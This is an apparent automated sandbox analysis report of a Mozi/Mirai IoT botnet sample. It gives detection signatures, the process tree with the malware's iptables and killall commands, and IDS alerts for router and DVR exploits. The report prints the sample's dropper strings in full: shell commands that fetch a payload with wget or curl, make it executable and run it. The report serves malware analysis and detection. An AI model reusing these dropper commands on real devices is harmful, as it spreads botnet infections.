Analysis Report mozi.a.zip

Overview

General Information

Sample Name: mozi.a.zip
Analysis ID: 349551
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Startup

  • system is lnxubuntu1
  • mozi.a.zip (PID: 4580, Parent: 4518, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/mozi.a.zip
    • mozi.a.zip New Fork (PID: 4596, Parent: 4580)
      • mozi.a.zip New Fork (PID: 4598, Parent: 4596)
        • sh (PID: 4600, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4602, Parent: 4600)
          • killall (PID: 4602, Parent: 4600, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • mozi.a.zip New Fork (PID: 4621, Parent: 4598)
          • sh (PID: 4634, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4638, Parent: 4634)
            • iptables (PID: 4638, Parent: 4634, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              • iptables New Fork (PID: 4652, Parent: 4638)
              • modprobe (PID: 4652, Parent: 4638, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4668, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4670, Parent: 4668)
            • iptables (PID: 4670, Parent: 4668, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4671, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4674, Parent: 4671)
            • iptables (PID: 4674, Parent: 4671, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
          • sh (PID: 4711, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4718, Parent: 4711)
            • iptables (PID: 4718, Parent: 4711, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4732, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4737, Parent: 4732)
            • iptables (PID: 4737, Parent: 4732, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4741, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4747, Parent: 4741)
            • iptables (PID: 4747, Parent: 4741, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
          • sh (PID: 4764, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4772, Parent: 4764)
            • iptables (PID: 4772, Parent: 4764, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4789, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4793, Parent: 4789)
            • iptables (PID: 4793, Parent: 4789, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
        • sh (PID: 4811, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4813, Parent: 4811)
          • iptables (PID: 4813, Parent: 4811, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4814, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4816, Parent: 4814)
          • iptables (PID: 4816, Parent: 4814, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4818, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4825, Parent: 4818)
          • iptables (PID: 4825, Parent: 4818, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4838, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4847, Parent: 4838)
          • iptables (PID: 4847, Parent: 4838, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4865, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4875, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4887, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4895, Parent: 4887)
          • iptables (PID: 4895, Parent: 4887, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4911, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4918, Parent: 4911)
          • iptables (PID: 4918, Parent: 4911, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4938, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4945, Parent: 4938)
          • iptables (PID: 4945, Parent: 4938, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4960, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4966, Parent: 4960)
          • iptables (PID: 4966, Parent: 4960, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4978, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4978)
          • iptables (PID: 4985, Parent: 4978, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4998, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5004, Parent: 4998)
          • iptables (PID: 5004, Parent: 4998, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5015, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5022, Parent: 5015)
          • iptables (PID: 5022, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5034, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5042, Parent: 5034)
          • iptables (PID: 5042, Parent: 5034, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5053, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5060, Parent: 5053)
          • iptables (PID: 5060, Parent: 5053, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5072, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5072)
          • iptables (PID: 5079, Parent: 5072, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5087, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5097, Parent: 5087)
          • iptables (PID: 5097, Parent: 5087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5113, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5118, Parent: 5113)
          • iptables (PID: 5118, Parent: 5113, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5217, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5219, Parent: 5217)
          • iptables (PID: 5219, Parent: 5217, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5220, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5222, Parent: 5220)
          • iptables (PID: 5222, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5223, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5226, Parent: 5223)
          • iptables (PID: 5226, Parent: 5223, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5233, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5242, Parent: 5233)
          • iptables (PID: 5242, Parent: 5233, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5255, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5265, Parent: 5255)
          • iptables (PID: 5265, Parent: 5255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5282, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5288, Parent: 5282)
          • iptables (PID: 5288, Parent: 5282, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
        • sh (PID: 5306, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5314, Parent: 5306)
          • iptables (PID: 5314, Parent: 5306, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5332, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5338, Parent: 5332)
          • iptables (PID: 5338, Parent: 5332, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
  • upstart New Fork (PID: 5136, Parent: 3310)
  • sh (PID: 5136, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5141, Parent: 5136)
    • date (PID: 5141, Parent: 5136, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5154, Parent: 5136)
    • apport-checkreports (PID: 5154, Parent: 5136, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5163, Parent: 3310)
  • sh (PID: 5163, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5164, Parent: 5163)
    • date (PID: 5164, Parent: 5163, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5181, Parent: 5163)
    • apport-gtk (PID: 5181, Parent: 5163, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5190, Parent: 3310)
  • sh (PID: 5190, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5191, Parent: 5190)
    • date (PID: 5191, Parent: 5190, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5208, Parent: 5190)
    • apport-gtk (PID: 5208, Parent: 5190, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

Source: mozi.a.zip, Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Author: Florian Roth, Strings:
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: mozi.a.zip, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: mozi.a.zip, Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Author: Joe Security
Source: mozi.a.zip, Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Author: Joe Security

Dropped Files

Source: /usr/networks, Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Author: Florian Roth, Strings:
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: /usr/networks, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: /usr/networks, Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Author: Joe Security
Source: /usr/networks, Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Author: Joe Security

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: mozi.a.zip, Avira: detected
Antivirus detection for dropped file
Source: /usr/networks, Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: mozi.a.zip, Virustotal: Detection: 65%
Source: mozi.a.zip, Metadefender: Detection: 51%
Source: mozi.a.zip, ReversingLabs: Detection: 67%

Spreading:

Found strings indicative of a multi-platform dropper
Source: mozi.a.zip, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: mozi.a.zip, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: mozi.a.zip, String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/mozi.a.zip (PID: 4621), Opens: /proc/net/route

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.114.71.142: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.187.191: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.162.120.168: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.20.247.252: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.18.39: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.197: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.89.22.107: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.91.239.157: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 166.127.254.2: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.171.22.94: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.141.42.51: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 36.89.55.95:6881 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 88.86.98.50: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.171.18:48131 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42806 -> 144.76.43.37:80
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35088 -> 23.254.64.88:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.97.168.156:5353 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.39.1.58: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.165.238.97: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.185.94.208: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.224.238.149: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.12.208:80 -> 192.168.2.20:49398
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60698 -> 159.140.205.214:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.159.88.60: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.189.42: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.193.139.218: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.169.97.135: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36372 -> 113.161.185.44:80
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic, Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:56274 -> 176.116.205.200:52869
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.167.162.206: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.22.47: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48524 -> 193.248.153.76:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.70.255:1900 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.193.84: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.7.204.55: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.45.252.1: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32776 -> 23.236.242.26:80
